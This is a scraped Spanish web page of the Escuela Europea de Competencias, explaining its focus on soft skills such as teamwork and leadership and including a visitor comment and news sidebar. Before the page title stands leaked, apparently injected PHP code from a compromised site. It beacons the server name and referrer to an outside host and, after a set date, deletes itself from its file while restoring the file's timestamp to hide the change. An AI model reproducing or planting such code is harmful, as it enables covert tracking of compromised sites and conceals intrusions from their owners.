check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731512){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php"); } Escuela Europea de Competencias | Enfoque

Forma parte de la escuela

Regístrate y disfruta de las ventajas de ser miembro de la Escuela Europea de Competencias

Ya soy miembro de EEC

También puedes crear una cuenta.

¿Has perdido tu contraseña?

Enfoque

La Escuela Europea de Competencias (EEC) nace con la vocación de formar y concienciar de la importancia de las competencias no curriculares, tanto a los profesionales como a las empresas, por lo que se enfoca al aumento de la empleabilidad de las personas y sostenibilidad de las empresas.

Aunque entrenar competencias como el trabajo en equipo, la comunicación, el liderazgo, la creatividad o la toma de decisiones es útil para cualquier persona, desde la EEC animamos especialmente a las personas en busca de empleo, las pequeñas empresas, emprendedores, trabajadores que buscan promocionarse en su empresa o encontrar otro trabajo, a que valoren el potencial de estas competencias, que ayudan a optimizar los resultados de forma sencilla y permanente, a la vez que aumentan la empleabilidad de quienes las poseen.

Todas las competencias se pueden desarrollar, en la Escuela te ayudamos y enseñamos cómo hacerlo de manera sencilla y casi sin esfuerzo. De ahí que la EEC haya puesto gratis y al servicio de todos nuestra plataforma online, así como Facebook y Twitter para entablar conversaciones sobre los beneficios de las competencias y cómo ejercitarlas de forma divertida.

Además, de forma continua organiza conferencias, talleres, experiencias presenciales gratuitos con el fin de iniciar a sus miembros en el desarrollo de sus competencias transversales.

Este enfoque responde a la paradoja de que aunque hay mucha demanda de empleo altamente cualificada, las empresas suelan tener dificultades para cubrir sus vacantes a la hora de requerir competencias transversales que aseguren la aportación de valor por parte de sus empleados.

Y es que el currículum debe contener mucho más que un conjunto de cursos realizados. Se necesitan, se buscan candidatos que sepan desenvolverse en un entorno en continuo cambio, y eso se traduce en que posean competencias como la adaptación al cambio, el trabajo en equipo, el liderazgo, la comunicación, el trabajo bajo presión, etc.

El objetivo principal es concienciar a los trabajadores y a las empresas de la importancia de determinadas competencias para el óptimo desarrollo de la actividad laboral, contribuir con el conocimiento colectivo entablando conversaciones con los usuarios sobre el tema que mejor conocemos; cómo avanzar mediante la gestión de competencias en la empresa y en la vida.

Hay tantas formas de participar y beneficiarse de la Escuela como seas capaz de imaginar. Entre las más sencillas, está registrarte de forma gratuita en nuestra plataforma online, donde podrás participar en experiencias virtuales para el fomento de competencias, así como mantener contactos con expertos de la EEC y otros usuarios. Te sugerimos otros modos de articulación en la pestaña “¿cómo lo hacemos?”

Además, puedes matricularte para recibir una formación personalizada y adaptada a tu perfil de manos de expertos de la Escuela Europea de Competencias, ponerte en contacto con nosotros si tienes una empresa y necesitas asesoramiento sobre perfiles técnicos y un largo etcétera.

Aquí puedes encontrar información más detallada sobre cómo participar y unirte a la EEC.

Y si tienes dudas o quieres saber más, ponte en contacto con nosotros a través de este email.

2 respuestas a Enfoque

  1. Hola buenos dias, mi nombre es Raquel y soy la presidenta de la cooperativa Barabara educación recien costituida y ubicada en Barcelona. Acabo de descubrir vuestra web y estoy emocionada porque vuestro planteamiento es muy similar al nuestro!!!
    me gustaria poder contactar con alguien de vosotros para poder compartir e incluso ver posibilidades de colaboración.

    Atentamente

    Raquel León
    Barabara Educació SCCL

    n

Deja un Comentario


× 7 = veinte uno

Noticias recientes

Formación “Gestor de Marketing Internacional” – Especialízate gratis!

Formación "Gestor de Marketing Internacional" - Especialízate gratis!

M.IN.D – “Marketing, Internacionalización y Desarrollo”,  es un proyecto europeo de la con[...]

Desmitificando el liderazgo

Desmitificando el liderazgo

¡Menos líderes y más liderazgo! ¡El liderazgo es acción, con un objetivo y un fin claro; no es[...]

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

Sevilla, 2 de Diciembre a las 11:00 horas ¿Sabías que las habilidades de búsqueda de empleo pued[...]

La Escuela en fotos

Accede a nuestra galería de imágenes en Flickr

Activos Recientemente

Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario

La escuela en la red

My Great Web page